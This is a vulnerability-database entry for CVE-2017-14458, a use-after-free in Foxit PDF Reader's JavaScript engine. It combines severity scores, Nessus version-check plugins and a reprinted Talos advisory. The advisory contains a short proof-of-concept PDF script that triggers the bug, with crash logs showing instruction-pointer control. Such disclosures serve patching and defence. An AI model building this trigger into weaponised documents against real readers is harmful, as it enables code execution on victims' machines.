Vulnerabilities > CVE-2017-14458 - Use After Free vulnerability in Foxit PDF Reader 8.3.2.25013

047910
CVSS 8.8 - HIGH
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
HIGH
Integrity impact
HIGH
Availability impact
HIGH
network
low complexity
foxit
CWE-416
nessus

Summary

An exploitable use-after-free vulnerability exists in the JavaScript engine of Foxit Software's Foxit PDF Reader version 8.3.2.25013. A specially crafted PDF document can trigger a previously freed object in memory to be reused, resulting in arbitrary code execution. An attacker needs to trick the user to open the malicious file to trigger this vulnerability. If the browser plugin extension is enabled, visiting a malicious site can also trigger the vulnerability.

Vulnerable Configurations

Part Description Count
Application
Foxit
1

Common Weakness Enumeration (CWE)

Nessus

  • NASL familyWindows
    NASL idFOXIT_PHANTOM_8_3_6.NASL
    descriptionAccording to its version, the Foxit PhantomPDF application (formally known as Phantom) installed on the remote Windows host is prior to 8.3.6. It is, therefore, affected by multiple vulnerabilities.
    last seen2020-06-01
    modified2020-06-02
    plugin id119837
    published2018-12-21
    reporterThis script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/119837
    titleFoxit PhantomPDF < 8.3.6 Multiple Vulnerabilities
    code
    #
    # (C) Tenable Network Security, Inc.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(119837);
      script_version("1.3");
      script_cvs_date("Date: 2019/10/31 15:18:52");
    
      script_cve_id(
        "CVE-2017-14458",
        "CVE-2017-17557",
        "CVE-2018-3842",
        "CVE-2018-3843",
        "CVE-2018-3850",
        "CVE-2018-3853",
        "CVE-2018-10302",
        "CVE-2018-10303"
      );
      script_bugtraq_id(103942, 103999);
    
      script_name(english:"Foxit PhantomPDF < 8.3.6 Multiple Vulnerabilities");
      script_summary(english:"Checks the version of Foxit PhantomPDF.");
    
      script_set_attribute(attribute:"synopsis", value:
    "A PDF toolkit installed on the remote Windows host is affected by
    multiple vulnerabilities.");
      script_set_attribute(attribute:"description", value:
    "According to its version, the Foxit PhantomPDF application (formally
    known as Phantom) installed on the remote Windows host is prior to
    8.3.6. It is, therefore, affected by multiple vulnerabilities.");
      # https://www.foxitsoftware.com/support/security-bulletins.php
      script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?2f244c3e");
      script_set_attribute(attribute:"solution", value:
    "Upgrade to Foxit PhantomPDF version 8.3.6 or later.");
      script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P");
      script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
      script_set_cvss3_base_vector("CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H");
      script_set_cvss3_temporal_vector("CVSS:3.0/E:U/RL:O/RC:C");
      script_set_attribute(attribute:"cvss_score_source", value:"CVE-2018-3853");
    
      script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");
    
      script_set_attribute(attribute:"vuln_publication_date", value:"2018/05/07");
      script_set_attribute(attribute:"patch_publication_date", value:"2018/05/07");
      script_set_attribute(attribute:"plugin_publication_date", value:"2018/12/21");
    
      script_set_attribute(attribute:"plugin_type", value:"local");
      script_set_attribute(attribute:"cpe", value:"cpe:/a:foxitsoftware:phantom");
      script_set_attribute(attribute:"cpe", value:"cpe:/a:foxitsoftware:phantompdf");
      script_end_attributes();
    
      script_category(ACT_GATHER_INFO);
      script_family(english:"Windows");
    
      script_copyright(english:"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
    
      script_dependencies("foxit_phantom_installed.nasl");
      script_require_keys("installed_sw/FoxitPhantomPDF");
    
      exit(0);
    }
    
    include('vcf.inc');
    
    app = 'FoxitPhantomPDF';
    
    app_info = vcf::get_app_info(app:app, win_local:TRUE);
    
    constraints = [{
      'min_version' : '8.0',
      'max_version' : '8.3.5.30351',
      'fixed_version' : '8.3.6'
      }];
    
    vcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);
    
  • NASL familyWindows
    NASL idFOXIT_READER_9_1_0_5096.NASL
    descriptionThe version of Foxit Reader installed on the remote Windows host is prior to 9.1. It is, therefore, affected by multiple vulnerabilities.
    last seen2020-04-30
    modified2018-04-27
    plugin id109399
    published2018-04-27
    reporterThis script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/109399
    titleFoxit Reader < 9.1 Multiple Vulnerabilities
    code
    #
    # (C) Tenable Network Security, Inc.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(109399);
      script_version("1.6");
      script_set_attribute(attribute:"plugin_modification_date", value:"2020/04/27");
    
      script_cve_id(
        "CVE-2017-14458",
        "CVE-2017-17557",
        "CVE-2018-3842",
        "CVE-2018-3850",
        "CVE-2018-3853"
      );
      script_bugtraq_id(103942);
      script_xref(name:"ZDI", value:"ZDI-18-312");
      script_xref(name:"ZDI", value:"ZDI-18-313");
      script_xref(name:"ZDI", value:"ZDI-18-315");
      script_xref(name:"ZDI", value:"ZDI-18-329");
      script_xref(name:"ZDI", value:"ZDI-18-330");
      script_xref(name:"ZDI", value:"ZDI-18-331");
      script_xref(name:"ZDI", value:"ZDI-18-332");
      script_xref(name:"ZDI", value:"ZDI-18-335");
      script_xref(name:"ZDI", value:"ZDI-18-339");
      script_xref(name:"ZDI", value:"ZDI-18-340");
      script_xref(name:"ZDI", value:"ZDI-18-341");
      script_xref(name:"ZDI", value:"ZDI-18-342");
      script_xref(name:"ZDI", value:"ZDI-18-344");
      script_xref(name:"ZDI", value:"ZDI-18-345");
      script_xref(name:"ZDI", value:"ZDI-18-346");
      script_xref(name:"ZDI", value:"ZDI-18-348");
      script_xref(name:"ZDI", value:"ZDI-18-349");
      script_xref(name:"ZDI", value:"ZDI-18-350");
      script_xref(name:"ZDI", value:"ZDI-18-351");
      script_xref(name:"ZDI", value:"ZDI-18-352");
      script_xref(name:"ZDI", value:"ZDI-18-354");
      script_xref(name:"ZDI", value:"ZDI-18-358");
      script_xref(name:"ZDI", value:"ZDI-18-359");
    
      script_name(english:"Foxit Reader < 9.1 Multiple Vulnerabilities");
      script_summary(english:"Checks the version of Foxit Reader.");
    
      script_set_attribute(attribute:"synopsis", value:
    "A PDF viewer installed on the remote Windows host is affected by
    multiple vulnerabilities.");
      script_set_attribute(attribute:"description", value:
    "The version of Foxit Reader installed on the remote Windows host is
    prior to 9.1. It is, therefore, affected by multiple vulnerabilities.");
      script_set_attribute(attribute:"see_also", value:"https://www.foxitsoftware.com/support/security-bulletins.php");
      script_set_attribute(attribute:"solution", value:
    "Upgrade to Foxit Reader version 9.1 or later.");
      script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P");
      script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
      script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H");
      script_set_cvss3_temporal_vector("CVSS:3.0/E:U/RL:O/RC:C");
      script_set_attribute(attribute:"cvss_score_source", value:"CVE-2017-14458");
    
      script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");
    
      script_set_attribute(attribute:"vuln_publication_date", value:"2018/04/19");
      script_set_attribute(attribute:"patch_publication_date", value:"2018/04/19");
      script_set_attribute(attribute:"plugin_publication_date", value:"2018/04/27");
    
      script_set_attribute(attribute:"plugin_type", value:"local");
      script_set_attribute(attribute:"cpe", value:"cpe:/a:foxitsoftware:foxit_reader");
      script_end_attributes();
    
      script_category(ACT_GATHER_INFO);
      script_family(english:"Windows");
    
      script_copyright(english:"This script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof.");
    
      script_dependencies("foxit_reader_installed.nasl");
      script_require_keys("installed_sw/Foxit Reader");
    
      exit(0);
    }
    
    include('vcf.inc');
    
    app = 'Foxit Reader';
    
    app_info = vcf::get_app_info(app:app, win_local:TRUE);
    
    constraints = [{
      'min_version' : '9.0',
      'fixed_version' : '9.1.0.5096'
      }];
    
    vcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);
    
  • NASL familyWindows
    NASL idFOXIT_PHANTOM_9_1_0_5096.NASL
    descriptionAccording to its version, the Foxit PhantomPDF application (formally known as Phantom) installed on the remote Windows host is prior to 9.1. It is, therefore, affected by multiple vulnerabilities.
    last seen2020-06-01
    modified2020-06-02
    plugin id109398
    published2018-04-27
    reporterThis script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/109398
    titleFoxit PhantomPDF < 9.1 Multiple Vulnerabilities
  • NASL familyWindows
    NASL idFOXIT_PHANTOM_9_1_0.NASL
    descriptionAccording to its version, the Foxit PhantomPDF application (formally known as Phantom) installed on the remote Windows host is prior to 9.1. It is, therefore, affected by multiple vulnerabilities.
    last seen2020-04-30
    modified2018-12-21
    plugin id119838
    published2018-12-21
    reporterThis script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/119838
    titleFoxit PhantomPDF < 9.1 Multiple Vulnerabilities

Seebug

bulletinFamilyexploit
description### Summary An exploitable use-after-free vulnerability exists in the JavaScript engine of Foxit Software's Foxit PDF Reader version 8.3.2.25013. A specially crafted PDF document can trigger a previously freed object in memory to be reused, resulting in arbitrary code execution. An attacker needs to trick the user to open the malicious file to trigger this vulnerability. If the browser plugin extension is enabled, visiting a malicious site can also trigger the vulnerability. ### Tested Versions Foxit Software Foxit PDF Reader 8.3.2.25013. ### Product URLs https://www.foxitsoftware.com/products/pdf-reader/ ### CVSSv3 Score 8.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H ### CWE CWE-416: Use After Free ### Details Foxit PDF Reader is one of the most popular PDF document readers, and has a widespread user base. It aims to have feature parity with Adobe’s Acrobat Reader. As a complete and feature-rich PDF reader, it supports JavaScript for interactive documents and dynamic forms. JavaScript support poses an additional attack surface. When executing embedded JavaScript code, a document can be closed, which essentially frees a lot of used objects, but the JavaScript can continue to execute. Invoking a method which keeps a stale reference to a now-freed object can lead to a use-after-free condition, which can be abused to execute arbitrary code. This particular vulnerability lies in this.search.query() method, which triggers a use-after-free condition when the following code is executed in a regular PDF document: ``` 7 0 obj << >> stream this.closeDoc(); this.search.query( ); endstream endobj ``` Opening this proof-of-concept PDF document in Foxit Reader with PageHeap enabled results in the following crash: ``` (498.14fc): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. *** ERROR: Symbol file could not be found. Defaulted to export symbols for FoxitReader_Lib_Full.exe - eax=00000000 ebx=21152ff8 ecx=107f0de8 edx=00000000 esi=1b630ff8 edi=037def5c eip=01562a78 esp=037ded5c ebp=037dedb0 iopl=0 nv up ei pl nz na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210206 FoxitReader_Lib_Full!CryptUIWizExport+0x5b0c58: 01562a78 8b11 mov edx,dword ptr [ecx] ds:002b:107f0de8=???????? 0:000> !heap -p -a ecx address 107f0de8 found in _DPH_HEAP_ROOT @ d4f1000 in free-ed allocation ( DPH_HEAP_BLOCK: VirtAddr VirtSize) 107414e0: 107f0000 2000 6bf4ab22 verifier!AVrfDebugPageHeapFree+0x000000c2 77c158e8 ntdll!RtlDebugFreeHeap+0x0000003c 77bc5bed ntdll!RtlpFreeHeap+0x0005616d 77b6fa0d ntdll!RtlFreeHeap+0x000007cd 0075bd5b FoxitReader_Lib_Full+0x005cbd5b 002bb657 FoxitReader_Lib_Full+0x0012b657 002be4d5 FoxitReader_Lib_Full+0x0012e4d5 0046596c FoxitReader_Lib_Full+0x002d596c 0046568f FoxitReader_Lib_Full+0x002d568f 0047d114 FoxitReader_Lib_Full+0x002ed114 005ca8e6 FoxitReader_Lib_Full+0x0043a8e6 0045c7ad FoxitReader_Lib_Full+0x002cc7ad 0045c4bf FoxitReader_Lib_Full+0x002cc4bf 005c043e FoxitReader_Lib_Full+0x0043043e 005ba7f6 FoxitReader_Lib_Full+0x0042a7f6 005be7b7 FoxitReader_Lib_Full+0x0042e7b7 005be846 FoxitReader_Lib_Full+0x0042e846 751ee0bb USER32!_InternalCallWinProc+0x0000002b 751f8849 USER32!InternalCallWinProc+0x00000020 751fb145 USER32!UserCallWinProcCheckWow+0x000001be 751e8503 USER32!DispatchClientMessage+0x000001b3 751e8aa0 USER32!__fnDWORD+0x00000050 77ba0bad ntdll!KiUserCallbackDispatcher+0x0000004d 751db95b USER32!SendMessageW+0x0000005b 00459022 FoxitReader_Lib_Full+0x002c9022 005c0667 FoxitReader_Lib_Full+0x00430667 005ba7f6 FoxitReader_Lib_Full+0x0042a7f6 005be7b7 FoxitReader_Lib_Full+0x0042e7b7 005be846 FoxitReader_Lib_Full+0x0042e846 751ee0bb USER32!_InternalCallWinProc+0x0000002b 751f8849 USER32!InternalCallWinProc+0x00000020 751fb145 USER32!UserCallWinProcCheckWow+0x000001be ``` Analyzing the heap state clearly shows that ecx points into a freed memory region. If we examine the next few instructions we can see the following: ``` 0:000> u FoxitReader_Lib_Full!CryptUIWizExport+0x5b0c58: 01562a78 8b11 mov edx,dword ptr [ecx] 01562a7a 8b4d0c mov ecx,dword ptr [ebp+0Ch] 01562a7d 8b8254020000 mov eax,dword ptr [edx+254h] 01562a83 ffd0 call eax ``` We can observe from the above listing that twice-dereferenced address from ecx, through edx+0x254 ends up in eax which is then used as argument to call instruction. This makes this vulnerability easy to exploit, since we can control the contents of ecx. With a bit of memory layout control, and with PageHeap off, we can get full EIP control: ``` (2ac4.25e4): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. *** ERROR: Symbol file could not be found. Defaulted to export symbols for FoxitReader_Lib_Full.exe - eax=41414141 ebx=0c6d5a60 ecx=0c665a20 edx=0c6b3948 esi=0c6d5950 edi=044ff464 eip=41414141 esp=044ff260 ebp=044ff2b8 iopl=0 nv up ei pl nz na po nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206 41414141 ?? ??? 0:000> k ChildEBP RetAddr WARNING: Frame IP not in any known module. Following frames may be wrong. 03aff0fc 01562a85 0x41414141 03aff158 01668d7f FoxitReader_Lib_Full!CryptUIWizExport+0x5b0c65 03aff200 01668632 FoxitReader_Lib_Full!CryptUIWizExport+0x6b6f5f 03aff2b4 005a1a57 FoxitReader_Lib_Full!CryptUIWizExport+0x6b6812 03aff2ec 01425a6e FoxitReader_Lib_Full+0x411a57 03aff320 0141d876 FoxitReader_Lib_Full!CryptUIWizExport+0x473c4e 03aff388 0141fc23 FoxitReader_Lib_Full!CryptUIWizExport+0x46ba56 03aff398 1640a0d6 FoxitReader_Lib_Full!CryptUIWizExport+0x46de03 03aff3b8 16444b63 0x1640a0d6 ``` Closing the document via JavaScript frees objects, but JavaScript continues to execute, and some stale references can cause a use after free, which is what happens in this case. Since the memory pointed at by ecx is freed, a careful heap manipulation can put it under attacker control, indirectly giving the control over eax, leading to arbitrary code execution. ### Timeline * 2017-12-12 - Vendor Disclosure * 2017-12-12 - Discussion with vendor on issues * 2018-01-29 - Vendor advised issue fixed in code scheduled for next release early April * 2018-04-01 - Vendor pushed release to mid April * 2018-04-19 - Vendor patch released * 2018-04-19 - Public disclosure
idSSV:97301
last seen2018-06-08
modified2018-05-17
published2018-05-17
reporterKnownsec
titleFoxit PDF Reader Javascript Search Query Remote Code Execution Vulnerability(CVE-2017-14458)

Talos

idTALOS-2017-0506
last seen2019-05-29
published2018-04-19
reporterTalos Intelligence
sourcehttp://www.talosintelligence.com/vulnerability_reports/TALOS-2017-0506
titleFoxit PDF Reader Javascript Search Query Remote Code Execution Vulnerability